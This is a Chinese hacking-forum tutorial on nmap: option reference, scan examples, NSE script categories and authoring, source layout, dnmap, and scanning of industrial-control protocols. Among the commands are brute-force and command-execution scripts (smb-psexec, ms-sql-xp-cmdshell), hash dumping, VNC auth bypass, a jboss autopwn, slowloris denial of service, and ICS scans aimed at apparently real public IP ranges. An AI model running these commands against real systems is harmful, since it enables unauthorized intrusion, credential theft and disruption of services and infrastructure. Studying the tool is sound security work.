黑帽联盟

 找回密码
 会员注册
查看: 1734|回复: 0
打印 上一主题 下一主题

[系统安全] 渗透工具之nmap使用

[复制链接]
yun 黑帽联盟官方人员 

920

主题

37

听众

1364

积分

超级版主

Rank: 8Rank: 8

  • TA的每日心情
    奋斗
    2019-10-18 11:20
  • 签到天数: 678 天

    [LV.9]以坛为家II

    本帖最后由 yun 于 2017-4-10 15:36 编辑

    简介
    nmap是一个网络连接端扫描软件,用来扫描网上电脑开放的网络连接端。确定哪些服务运行在哪些连接端,并且推断计算机运行哪个操作系统(这是亦称 fingerprinting)。它是网络管理员和hacker必用的软件之一。

    常用参数说明
    1. -iL filename                    从文件中读取待检测的目标,文件中的表示方法支持机名,ip,网段
    2. -iR hostnum                     随机选取,进行扫描.如果-iR指定为0,则是无休止的扫描
    3. --exclude host1[, host2]        从扫描任务中需要排除的主机           
    4. --exculdefile exclude_file      排除文件中的IP,格式和-iL指定扫描文件的格式相同
    5. 主机发现
    6. -sL                     仅仅是显示,扫描的IP数目,不会进行任何扫描
    7. -sn                     ping扫描,即主机发现
    8. -Pn                     不检测主机存活
    9. -PS/PA/PU/PY[portlist]  TCP SYN Ping/TCP ACK Ping/UDP Ping发现
    10. -PE/PP/PM               使用ICMP echo, timestamp and netmask 请求包发现主机
    11. -PO[prococol list]      使用IP协议包探测对方主机是否开启   
    12. -n/-R                   不对IP进行域名反向解析/为所有的IP都进行域名的反响解析
    13. 扫描技巧
    14. -sS/sT/sA/sW/sM                 TCP SYN/TCP connect()/ACK/TCP窗口扫描/TCP Maimon扫描
    15. -sU                             UDP扫描
    16. -sN/sF/sX                       TCP Null,FIN,and Xmas扫描
    17. --scanflags                     自定义TCP包中的flags
    18. -sI zombie host[:probeport]     Idlescan
    19. -sY/sZ                          SCTP INIT/COOKIE-ECHO 扫描
    20. -sO                             使用IP protocol 扫描确定目标机支持的协议类型
    21. -b “FTP relay host”             使用FTP bounce scan
    22. 指定端口和扫描顺序
    23. -p                      特定的端口 -p80,443 或者 -p1-65535
    24. -p U:PORT               扫描udp的某个端口, -p U:53
    25. -F                      快速扫描模式,比默认的扫描端口还少
    26. -r                      不随机扫描端口,默认是随机扫描的
    27. --top-ports "number"    扫描开放概率最高的number个端口,出现的概率需要参考nmap-services文件,ubuntu中该文件位于/usr/share/nmap.nmap默认扫前1000个
    28. --port-ratio "ratio"    扫描指定频率以上的端口
    29. 服务版本识别
    30. -sV                             开放版本探测,可以直接使用-A同时打开操作系统探测和版本探测
    31. --version-intensity "level"     设置版本扫描强度,强度水平说明了应该使用哪些探测报文。数值越高,服务越有可能被正确识别。默认是7
    32. --version-light                 打开轻量级模式,为--version-intensity 2的别名
    33. --version-all                   尝试所有探测,为--version-intensity 9的别名
    34. --version-trace                 显示出详细的版本侦测过程信息
    35. 脚本扫描
    36. -sC                             根据端口识别的服务,调用默认脚本
    37. --script=”Lua scripts”          调用的脚本名
    38. --script-args=n1=v1,[n2=v2]     调用的脚本传递的参数
    39. --script-args-file=filename     使用文本传递参数
    40. --script-trace                  显示所有发送和接收到的数据
    41. --script-updatedb               更新脚本的数据库
    42. --script-help=”Lua script”      显示指定脚本的帮助
    43. OS识别
    44. -O              启用操作系统检测,-A来同时启用操作系统检测和版本检测
    45. --osscan-limit  针对指定的目标进行操作系统检测(至少需确知该主机分别有一个open和closed的端口)
    46. --osscan-guess  推测操作系统检测结果,当Nmap无法确定所检测的操作系统时,会尽可能地提供最相近的匹配,Nmap默认进行这种匹配
    47. 防火墙/IDS躲避和哄骗
    48. -f; --mtu value                 指定使用分片、指定数据包的MTU.
    49. -D decoy1,decoy2,ME             使用诱饵隐蔽扫描
    50. -S IP-ADDRESS                   源地址欺骗
    51. -e interface                    使用指定的接口
    52. -g/ --source-port PROTNUM       使用指定源端口  
    53. --proxies url1,[url2],...       使用HTTP或者SOCKS4的代理

    54. --data-length NUM               填充随机数据让数据包长度达到NUM
    55. --ip-options OPTIONS            使用指定的IP选项来发送数据包
    56. --ttl VALUE                     设置IP time-to-live域
    57. --spoof-mac ADDR/PREFIX/VEBDOR  MAC地址伪装
    58. --badsum                        使用错误的checksum来发送数据包
    59. Nmap 输出
    60. -oN                     将标准输出直接写入指定的文件
    61. -oX                     输出xml文件
    62. -oS                     将所有的输出都改为大写
    63. -oG                     输出便于通过bash或者perl处理的格式,非xml
    64. -oA BASENAME            可将扫描结果以标准格式、XML格式和Grep格式一次性输出
    65. -v                      提高输出信息的详细度
    66. -d level                设置debug级别,最高是9
    67. --reason                显示端口处于带确认状态的原因
    68. --open                  只输出端口状态为open的端口
    69. --packet-trace          显示所有发送或者接收到的数据包
    70. --iflist                显示路由信息和接口,便于调试
    71. --log-errors            把日志等级为errors/warings的日志输出
    72. --append-output         追加到指定的文件
    73. --resume FILENAME       恢复已停止的扫描
    74. --stylesheet PATH/URL   设置XSL样式表,转换XML输出
    75. --webxml                从namp.org得到XML的样式
    76. --no-sytlesheet         忽略XML声明的XSL样式表
    77. 其他nmap选项
    78. -6                      开启IPv6
    79. -A                      OS识别,版本探测,脚本扫描和traceroute
    80. --datedir DIRNAME       说明用户Nmap数据文件位置
    81. --send-eth / --send-ip  使用原以太网帧发送/在原IP层发送
    82. --privileged            假定用户具有全部权限
    83. --unprovoleged          假定用户不具有全部权限,创建原始套接字需要root权限
    84. -V                      打印版本信息
    85. -h                      输出帮助
    复制代码

    用例
    扫描网段 (192.168.1.0/24)
    nmap -sP 192.168.1.0/24 或者 nmap -sP 192.168.1.*
    2.png

    SYN对全端口进行扫描
    在aggressive(4)的时间模板下,同时对开放的端口进行端口识别,并查看相应的服务器版本。
    nmap -sS -T4 -p1-65535 -sV 192.168.1.169
    3.png

    在aggressive(4)的时间模板下,探测操作系统的类型和版本,并显示traceroute的结果。
    nmap -sS -T4 -A 192.168.1.169
    4.png

    nmap -sS -T4 -A -O 192.168.1.169
    5.png

    文件中读取需要扫描的IP列表
    nmap -iL ips.txt
    6.png

    扫描的结果输出处理
    将扫描的结果输出到屏幕,同时存储一份到output.txt。
    nmap -sS -p1-65525 192.168.1.169 -oG output.txt
    7.png

    扫描结果输出为html。
    nmap -sS -p1-65525 192.168.1.169 --webxml -oX - | xsltproc --output  file.html


    在子网中发现开放netbios的IP
    nmap -sV -v -p139,445 192.168.1.0/24
    8.png

    扫描指定netbios的名称
    nmap -sU --script nbstat.nse -p 137 target

    扫描指定的目标,同时检测相关漏洞
    nmap --script-args=unsafe=1 --script smb-check-vulns.nse -p 445 169
    10.png

    nmap脚本使用
    常用脚本说明
    1. auth: 负责处理鉴权证书(绕开鉴权)的脚本  
    2. broadcast: 在局域网内探查更多服务开启状况,如dhcp/dns/sqlserver等服务  
    3. brute: 提供暴力破解方式,针对常见的应用如http/snmp等  
    4. default: 使用-sC或-A选项扫描时候默认的脚本,提供基本脚本扫描能力  
    5. discovery: 对网络进行更多的信息,如SMB枚举、SNMP查询等  
    6. dos: 用于进行拒绝服务攻击  
    7. exploit: 利用已知的漏洞入侵系统  
    8. external: 利用第三方的数据库或资源,例如进行whois解析  
    9. fuzzer: 模糊测试的脚本,发送异常的包到目标机,探测出潜在漏洞 intrusive: 入侵性的脚本,此类脚本可能引发对方的IDS/IPS的记录或屏蔽  
    10. malware: 探测目标机是否感染了病毒、开启了后门等信息  
    11. safe: 此类与intrusive相反,属于安全性脚本  
    12. version: 负责增强服务与版本扫描(Version Detection)功能的脚本  
    13. vuln: 负责检查目标机是否有常见的漏洞(Vulnerability),如是否有MS08_067
    复制代码

    负责处理鉴权证书(绕开鉴权)的脚本,也可以作为检测部分应用弱口令
    nmap --script=auth 192.168.1.*
    11.png

    提供暴力破解的方式 可对数据库,smb,snmp等进行简单密码的暴力猜解
    nmap --script=brute 192.168.1.169
    12.png

    默认的脚本扫描,主要是搜集各种应用服务的信息,收集到后,可再针对具体服务进行攻击
    nmap --script=default 192.168.1.169 或者 nmap -sC 192.168.1.169
    13.png

    检查是否存在常见漏洞
    nmap --script=vuln 192.168.1.169
    14.png

    在局域网内探查更多服务开启状况
    nmap -n -p445 --script=broadcast 192.168.1.169
    15.png

    利用第三方的数据库或资源,例如进行whois解析
    nmap --script external 192.168.1.169
    16.png

    vnc扫描
    nmap --script=realvnc-auth-bypass 192.168.1.169
    17.png

    获取vnc信息
    nmap --script=vnc-info 192.168.1.169
    18.png

    smb扫描
    说明:SMB协议是基于TCP-NETBIOS下的,一般端口使用为139,445。
    nmap --script=smb-brute.nse 192.168.1.169
    19.png

    • smb字典破解
    nmap --script=smb-brute.nse --script-args=userdb=/var/passwd,passdb=/var/passwd 192.168.1.169

    • smb已知几个严重漏扫描
    nmap  --script=smb-check-vulns.nse --script-args=unsafe=1 192.168.1.169
    20.png

    • smb查看共享目录
    nmap -p 445  --script smb-ls --script-args 'share=c$,path=\test,smbuser=administrator,smbpass=fuckyou' 192.168.1.169
    21.png

    • smb查询主机一些敏感信息
    nmap -p 445 -n –script=smb-psexec --script-args 'smbuser=administrator,smbpass=fuckyou' 192.168.1.169
    • smb查看会话
    nmap -p 445 -n --script=smb-enum-sessions  --script-args 'smbuser=administrator,smbpass=fuckyou' 192.168.1.169
    22.png

    • smb系统信息
    nmap -p 445 -n --script=smb-os-discovery  --script-args 'smbuser=administrator,smbpass=fuckyou' 192.168.1.169
    23.png

    猜解mssql用户名和密码
    nmap -p1433 --script=ms-sql-brute --script-args=userdb=/var/passwd,passdb=/var/passwd 192.168.1.169
    xp_cmdshell 执行命令
    nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=sa,ms-sql-xp-cmdshell.cmd="net user" 192.168.1.169

    dumphash值
    nmap -p 1433 --script ms-sql-dump-hashes --script-args mssql.username=sa,mssql.password=sa 192.168.1.169
    扫描root空口令
    nmap -p3306 --script=mysql-empty-password 192.168.1.169
    24.png

    列出所有MySQL用户
    nmap -p3306 --script=mysql-users --script-args=mysqluser=root 192.168.1.169
    25.png

    支持同一应用的所有脚本扫描
    nmap --script=mysql-* 192.168.1.169
    26.png

    Oracle sid扫描
    nmap --script=oracle-sid-brute -p 1521-1560 192.168.1.5

    Oracle弱口令破解
    nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=ORCL,userdb=/var/passwd,passdb=/var/passwd 192.168.1.5

    其他一些比较好用的脚本
    1. nmap --script=broadcast-netbios-master-browser 192.168.137.4   发现网关  
    2. nmap -p 873 --script rsync-brute --script-args 'rsync-brute.module=www' 192.168.137.4  破解rsync  
    3. nmap --script informix-brute -p 9088 192.168.137.4    informix数据库破解  
    4. nmap -p 5432 --script pgsql-brute 192.168.137.4       pgsql破解  
    5. nmap -sU --script snmp-brute 192.168.137.4            snmp破解  
    6. nmap -sV --script=telnet-brute 192.168.137.4          telnet破解  
    7. nmap --script=http-vuln-cve2010-0738 --script-args 'http-vuln-cve2010-0738.paths={/path1/,/path2/}' <target>  jboss autopwn  
    8. nmap --script=http-methods.nse 192.168.137.4 检查http方法  
    9. nmap --script http-slowloris --max-parallelism 400 192.168.137.4  dos攻击,对于处理能力较小的站点还挺好用的 'half-HTTP' connections   
    10. nmap --script=samba-vuln-cve-2012-1182  -p 139 192.168.137.4
    复制代码

    nmap脚本编写
    需要使用Lua脚本语言编写。
    基于传统的语言标准,我们写一个脚本,作用:遇到开放的HTTP端口,就返回”Hello World”。
    代码如下:
    1. -- The Head Section --
    2. -- The Rule Section --
    3. portrule = function(host, port)
    4.     return port.protocol == "tcp" and port.number == 80 and port.state == "open"
    5. end

    6. -- The Action Section --
    7. action = function(host, port)
    8.     return "Hello world !"
    9. end
    10. 注意:以--起始的行表示注释。
    复制代码

    NSE脚本主要由三部分组成:
    The Head Section
    该部分包含一些元数据,主要描述脚本的功能,作者,影响力,类别及其他。
    The Rule Section
    该部分定义脚本执行的必要条件。至少包含下面列表中的一个函数:
    portrule
    hostrule
    prerule
    postrule
    此案例中,重点介绍portrule。portrule能够在执行操作前,检查host和port属性。portrule会利用nmap的API检查TCP80端口。
    The Action Section
    该部分定义脚本逻辑。此处案例中,检测到开放80端口,则打印“HelloWorld”。脚本的输出内容,会在nmap执行期间显示出来。
    nmap -sS -p 22,80,443 --script ./http-vuln-check.nse 192.168.1.169
    27.png

    python-nmap使用pip install python-nmap

    libnmap使用
    文档: https://libnmap.readthedocs.org/en/latest/

    nmap源码分析
    结构如下:
    1. Nmap/
    2. ├─docs(Nmap相关文档,包括License、usage说明及XMLschema文件等)
    3. │  ├─licenses   
    4. │  └─man-xlate
    5. ├─libdnet-stripped(libdnet:简单的网络接口开源库)
    6. │  ├─config
    7. │  ├─include
    8. │  └─src
    9. ├─liblinear(LIBLINEAR:负责大型线性分类的开源库)
    10. │  └─blas
    11. ├─liblua(Lua脚本语言源码库)
    12. ├─libnetutil(Nmap实现的基本的网络实用函数)
    13. ├─libpcap(开源的抓包代码库libpcap)
    14. │  ├─bpf
    15. │  ├─ChmodBPF
    16. │  ├─lbl
    17. │  ├─missing
    18. │  ├─msdos
    19. │  ├─NMAP_MODIFICATIONS
    20. │  ├─packaging
    21. │  ├─pcap
    22. │  ├─SUNOS4
    23. │  ├─tests
    24. │  └─Win32
    25. ├─libpcre(Perl兼容的正则表达式开源库libpcre)
    26. ├─macosx(该目录负责支持苹果的操作系统MACOS X)
    27. │  └─nmap.pmdoc
    28. ├─mswin32(该目录负责支持Windows操作系统)
    29. │  ├─lib
    30. │  ├─license-format
    31. │  ├─NET
    32. │  ├─NETINET
    33. │  ├─nsis
    34. │  ├─OpenSSL
    35. │  ├─pcap-include
    36. │  ├─RPC
    37. │  └─winpcap
    38. ├─nbase(Nmap封装的基础使用程序库,包括string/path/random等)
    39. ├─ncat(Ncat是Nmap项目组实现的新版的netcat:强大的网络工具)
    40. │  ├─certs
    41. │  ├─docs
    42. │  └─test
    43. ├─ndiff(Ndiff是用于比较Nmap扫描结果的实用命令)
    44. │  ├─docs
    45. │  └─test-scans
    46. ├─nmap-update(负责Nmap更新相关操作)
    47. ├─nping(Nping是Nmap项目组实现的新版的Hping:网络探测与构建packet)
    48. │  └─docs
    49. ├─nselib(Nmap使用Lua语言编写的常用的脚本库)
    50. │  └─data
    51. ├─nsock(Nmap实现的并行的SocketEvent处理库)
    52. │  ├─include
    53. │  └─src
    54. ├─scripts(Nmap提供常用的扫描检查的lua脚本)
    55. ├─todo(介绍Nmap项目将来开发的具体任务)
    56. └─zenmap(Nmap的官方的图形界面程序,由python语言编写)
    57.    ├─install_scripts
    58.    ├─radialnet
    59.    ├─share
    60.    ├─test
    61.    ├─zenmapCore
    62.    └─zenmapGUI
    复制代码

    nmap6.0工程内总共包括1300多个文件。
    C和C++文件有600多个,主要实现Nmap最核心的功能:主机发现、端口扫描、服务侦测、OS侦测及搭建脚本引擎框架;也包括其他开源项目如libpcap的源码。
    Python文件有100多个,主要实现Zenmap图形界面,Zenmap会调用到Nmap基本命令,也实现一些新的功能:例如确定网络拓扑结构、Profile的管理(常用的命令保存为Profile)等。

    Lua与NSE文件400多个,负责构建Nmap脚本引擎及提供常用的扫描脚本。其中NSE格式为Nmap定制的Lua文件,方便用户自行编写脚本进行功能扩展。
    XML文件数十个,用于辅助描述Nmap的内容或Zenmap的测试等工作。

    其他文件,其他辅助工具操作的文件。

    执行流程:
    28.png

    nmap分布式版本- dnmap
    dnmap_server的用法
    dnmap_server -h新建一个nmap 命令文件command.txt提交作业给服务器机子:dnmap_server -f ./command.txt
    29.png

    30.png

    31.png

    服务端启动之后,就开始等待客户端链接。
    dnmap_client的用法
    dnmap_client -h连接到服务器地址,端口号及客户端的命名dnmap_client -s 192.168.1.152 -a 'salve01'默认情况下扫描结果都被存储在名为 "nmap_result/." 目录下。
    32.png

    33.png

    34.png

    nmap工控分析
    工控分析也利用搜索引擎:shodan/zoomeye;下面主要介绍nmap常用的脚本。
    • Ethernet/IP 44818
    nmap -p 44818 --script enip-enumerate.nse 85.132.179.*
    • Modbus 502
    nmap --script modicon-info.nse -Pn -p 502 -sV 91.83.43.*
    • IEC 61870-5-101/104 2404
    nmap -Pn -n -d --script iec-identify.nse --script-args=iec-identify -p 2404 80.34.253.*
    • Siemens S7 102
    nmap -p 102 --script s7-enumerate -sV 140.207.152.*nmap -d --script mms-identify.nse --script-args='mms-identify.timeout=500' -p 102 IP
    • Tridium Niagara Fox 1911
    nmap -p 1911 --script fox-info 99.55.238.*
    帖子永久地址: 

    黑帽联盟 - 论坛版权1、本主题所有言论和图片纯属会员个人意见,与本论坛立场无关
    2、本站所有主题由该帖子作者发表,该帖子作者与黑帽联盟享有帖子相关版权
    3、其他单位或个人使用、转载或引用本文时必须同时征得该帖子作者和黑帽联盟的同意
    4、帖子作者须承担一切因本文发表而直接或间接导致的民事或刑事法律责任
    5、本帖部分内容转载自其它媒体,但并不代表本站赞同其观点和对其真实性负责
    6、如本帖侵犯到任何版权问题,请立即告知本站,本站将及时予与删除并致以最深的歉意
    7、黑帽联盟管理员和版主有权不事先通知发贴者而删除本文

    您需要登录后才可以回帖 登录 | 会员注册

    发布主题 !fastreply! 收藏帖子 返回列表 搜索
    回顶部